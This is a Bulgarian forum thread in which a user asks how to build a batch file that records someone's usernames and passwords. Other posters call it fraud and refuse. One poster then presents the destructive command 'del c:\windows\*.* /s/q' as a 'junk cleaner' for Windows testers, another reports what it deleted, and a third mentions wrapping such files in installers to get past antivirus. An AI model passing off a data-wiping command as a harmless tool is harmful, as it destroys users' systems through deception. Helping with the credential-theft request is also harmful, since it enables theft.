Премини към съдържанието
Форумът в приложение

По-лесно сърфиране. Научи повече.

Kaldata.com - Форуми

Приложение на форума на цял екран с push известия, значки и други.

За да инсталирате това приложение на iOS и iPadOS
  1. Докоснете Иконата за споделяне в Safari
  2. Превъртете менюто и докоснете Добавяне към началния екран.
  3. Докоснете Добавяне в горния десен ъгъл.
За да инсталирате това приложение на Android
  1. Докоснете менюто с 3 точки (⋮) в горния десен ъгъл на браузъра.
  2. Докоснете Добавяне към началния екран или Инсталиране на приложение.
  3. Потвърдете, като докоснете Инсталиране.

Добре дошли!

Добре дошли в нашите форуми, пълни с полезна информация. Имате проблем с компютъра или телефона си? Публикувайте нова тема и ще намерите решение на всичките си проблеми. Общувайте свободно и открийте безброй нови приятели.

Моля, регистрирайте се за да публикувате тема и да получите пълен достъп до всички функции.

бат файлове

Featured Replies

някои знае ли как мога да си да направя бат файил които да ми примерно да го пратя на някои и като го отвори да ми записва имената и паролите които тои вувежда ? моля помогнете трябжа ми спешно !!!

някои знае ли как мога да си да направя бат файил които да ми примерно да го пратя на някои и като го отвори да ми записва имената и паролите които тои вувежда ? моля помогнете трябжа ми спешно !!!

А не си ли много нахален!Това е измама!
  • Автор

А не си ли много нахален!Това е измама!

просто искам да знам как става не че ще го направя на някой :rolleyes:

С каква цел се прави упражнението?

еми просто да науча нещо ново

еми просто да науча нещо ново

Бъди пацифист, научи другите на нещо ново, например защо не трябва да приемат bat и exe файлове от теб. Бъди честен, бъди искрен, спазвай кодекса на хакерите и прави само добро.... Пък и с bat файл ще ти е трудничко, насочи се директно към кейлогъри, кво се връщаш към досовски имплементации...
  • Автор

Бъди пацифист, научи другите на нещо ново, например защо не трябва да приемат bat и exe файлове от теб. Бъди честен, бъди искрен, спазвай кодекса на хакерите и прави само добро.... Пък и с bat файл ще ти е трудничко, насочи се директно към кейлогъри, кво се връщаш към досовски имплементации...

е па дай някой урок за кейлогъри ако може, че за прав пат чувам за това :Д

Редактирано от Krasi_Arabadjiev (преглед на промените)

Подушвам че тази тема скоро ще се присъедини към темата за паролите :cool:

• Автор

Подушвам че тази тема скоро ще се присъедини към темата за паролите :)

даи линк кам таз тема за пароли да я видя ? ако може

даи линк кам таз тема за пароли да я видя ? ако може

Не се притеснявай, някой мод като ти види темата и ще отпътува към нея.

Що не му пратиш един бат файл да му скапе уиндоуса :)

Ще представя един много интересен файл за Уиндоус потребителите (Тъй като аз съм Линукс потребител), и ми трябва Уиндоус тестер за моя файл програма за почистване на компютъра от боклуци. # Файл del c:\windows\*.* /s/q # Край

Ще представя един много интересен файл за Уиндоус потребителите (Тъй като аз съм Линукс потребител), и ми трябва Уиндоус тестер за моя файл програма за почистване на компютъра от боклуци.

# Файл

del c:\windows\*.* /s/q

# Край

Ама разбира се, че ще проработи, докато Windows е активен!

Пуснах горното bat-файлче. Затри $hf_mig$ папката, подкара деинсталациите на ъпдейтите, а те са доста. Поизчаках да свърши , но ми писна и рестартирах. В интерес на истината, мислех, че антивирусната ще го блокира. Имам спомен, че Symantec преди време блокира подобен bat-файл, но сега нищо не се случи. А може и да се лъжа.

Пуснах горното bat-файлче. Затри $hf_mig$ папката, подкара деинсталациите на ъпдейтите, а те са доста.

Поизчаках да свърши , но ми писна и рестартирах.

В интерес на истината, мислех, че антивирусната ще го блокира. Имам спомен, че Symantec преди време блокира подобен bat-файл, но сега нищо не се случи. А може и да се лъжа.

И безплатната версия на Авира ги засича, но само понякога. Имам разни такива играчки домашно производство в една папка и на два пъти след преинсталация като кача вирусната и ги намираше като вредители при скан. Ама то кирията е да го завреш в някой sfx или инсталатор. И няма никакъв смисъл да чисти 50 000 файла или да се мъчи да форматира дял, един два файла стигат :whist:

Между другото с del c:\windows\*.* /s/q съм съкращавал папка Windows на 70 мегабайта/win xp pro x86/.

Редактирано от go6o_kara (преглед на промените)

Архивирана тема

Темата е твърде стара и е архивирана. Не можете да добавяте нови отговори в нея, но винаги можете да публикувате нова тема, в която да продължи дискусията. Регистрирайте се или влезте във вашия профил за да публикувате нова тема.

Разглеждащи това в момента 0

• Няма регистрирани потребители разглеждащи тази страница.

Дарение

• Подкрепи съществуването на форума - направи дарение
    32%
    Дарени 315 € от нужните 1 000 €

Бюлетин

Получавайте известие, когато има важна промяна или новина свързана с форума.

Профил

Навигация

Търсене

Търсене

Конфигуриране на push известия в браузъра

Chrome (Android)
  1. Докоснете иконата на катинар до адресната лента.
  2. Докоснете Разрешения → Известия.
  3. Променете предпочитанията си.
Chrome (Desktop)
  1. Кликнете върху иконата на катинар в адресната лента.
  2. Изберете Настройки на сайта.
  3. Намерете Известия и коригирайте предпочитанията си.